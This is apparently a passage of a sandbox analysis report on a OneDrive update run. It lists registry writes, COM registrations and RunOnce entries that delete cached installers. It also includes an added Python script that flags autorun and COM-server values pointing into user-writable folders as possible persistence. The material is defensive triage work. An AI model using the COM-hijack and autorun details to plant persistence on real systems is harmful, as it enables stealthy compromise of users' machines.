| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ThreadingModel = "Both" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuthLib.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileCoAuthLib64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileCoAuthLib64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{389510B7-9E58-40D7-98BF-60B911CB0EA9}\LOCALSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
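Every row in the COM-server table above and in this Run-key table is written by OneDrive.exe or OneDriveSetup.exe under the user's AppData, and the two RunOnce values are cmd.exe /c del commands that remove the cached installer, so in this detonation they record the OneDrive updater's own housekeeping rather than persistence set up by the detonated sample. Telling those cases apart by hand across a few hundred rows is error-prone. The script below is an added example (not part of the sandbox's report or of any tool the page mentions): it parses rows in this report's own Description | Indicator | Process | Target layout, keeps only value writes to Run/RunOnce keys and to the (Default) value of InprocServer32/LocalServer32 keys, extracts the image the data actually points at, and marks whether that image (or anything else in the data) sits in a user-writable directory. The four sample rows are copied from this report's tables; the user-writable directory list and file-extension list are the example's own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample: four rows copied from this report's own
# "Description | Indicator | Process | Target" tables. Two should be flagged
# (a RunOnce autorun and a COM InprocServer32 default value); the
# ThreadingModel write and the read-only query should not.
SAMPLE_ROWS = r"""
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
"""

RUN_KEY = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run(once)?$")
COM_SERVER = re.compile(r"(?i)\\(inprocserver32|localserver32)$")
# Assumed list of locations a standard user can write to; a server or autorun
# image living here can be replaced without administrative rights.
USER_WRITABLE = re.compile(
    r"(?i)\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\"
    r"|\\programdata\\|\\windows\\temp\\|\\temp\\"
)
# Assumed set of extensions that mark the end of the image path in a command line.
EXECUTABLE = re.compile(r'(?i)^"?(?P<exe>.*?\.(?:exe|dll|com|scr|bat|cmd|ps1|vbs|js))(?:"|\s|$)')
INDICATOR = re.compile(r'^(?P<path>.*?)(?: = "(?P<data>.*)")?$')


@dataclass
class Finding:
    kind: str                 # "autorun" or "com_server"
    key: str
    value_name: str
    executable: str           # image the registry data actually points at
    exe_user_writable: bool   # image itself lives in a user-writable directory
    data_refs_user_writable: bool  # anything in the data (e.g. an argument) does
    process: str              # process that wrote the value


def parse_rows(text):
    """Split '| a | b | c | d |' table rows into (description, indicator, process, target)."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split(" | ")]
        if len(cells) == 4:
            rows.append(tuple(cells))
    return rows


def unescape(data):
    # The report doubles backslashes and escapes embedded quotes in REG_SZ data.
    return data.replace('\\"', '"').replace("\\\\", "\\")


def analyze(text):
    findings = []
    for description, indicator, process, _target in parse_rows(text):
        if not description.startswith("Set value"):
            continue                      # reads and deletes create no autorun
        m = INDICATOR.match(indicator)
        if m is None or m.group("data") is None:
            continue
        key, _, value_name = m.group("path").rpartition("\\")
        data = unescape(m.group("data"))
        if RUN_KEY.search(key):
            kind = "autorun"
        elif COM_SERVER.search(key) and value_name == "":
            kind = "com_server"           # only the (Default) value names the server
        else:
            continue                      # ThreadingModel etc. carry no image path
        em = EXECUTABLE.match(data)
        exe = em.group("exe") if em else data
        findings.append(Finding(
            kind=kind, key=key, value_name=value_name or "(Default)",
            executable=exe,
            exe_user_writable=bool(USER_WRITABLE.search(exe)),
            data_refs_user_writable=bool(USER_WRITABLE.search(data)),
            process=process,
        ))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_ROWS):
        print(f"{f.kind:10} {f.value_name:28} -> {f.executable}"
              f"  [image in user-writable dir: {f.exe_user_writable}]")
```

On the sample rows the RunOnce entry resolves to C:\Windows\system32\cmd.exe with a user-writable path only in its arguments (a delete command), while the InprocServer32 default resolves to a DLL under AppData. The second pattern is what a COM-hijack or shell-extension persistence looks like, so a reviewer should check that the image is signed and belongs to the product that registered it before dismissing it as updater noise.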
Checks installed software on the system
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\SyncEngineCOMServer.SyncEngineCOMServer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ = "ISyncItemPathCallback" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ = "IFileUploader" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\ProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\FLAGS\ = "0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{2E7C0A19-0438-41E9-81E3-3AD3D64F55BA}\PROGID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\INTERFACE\{E9DE26A1-51B2-47B4-B1BF-C87059CC02A7}\TYPELIB | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\FLAGS\ = "0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ = "IOneDriveInfoProvider" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\AppID\{EEABD3A3-784D-4334-AAFC-BB13234F17CF} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\TypeLib\{4B1C80DA-FA45-468F-B42B-46496BDBE0C5}\1.0\0\win32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
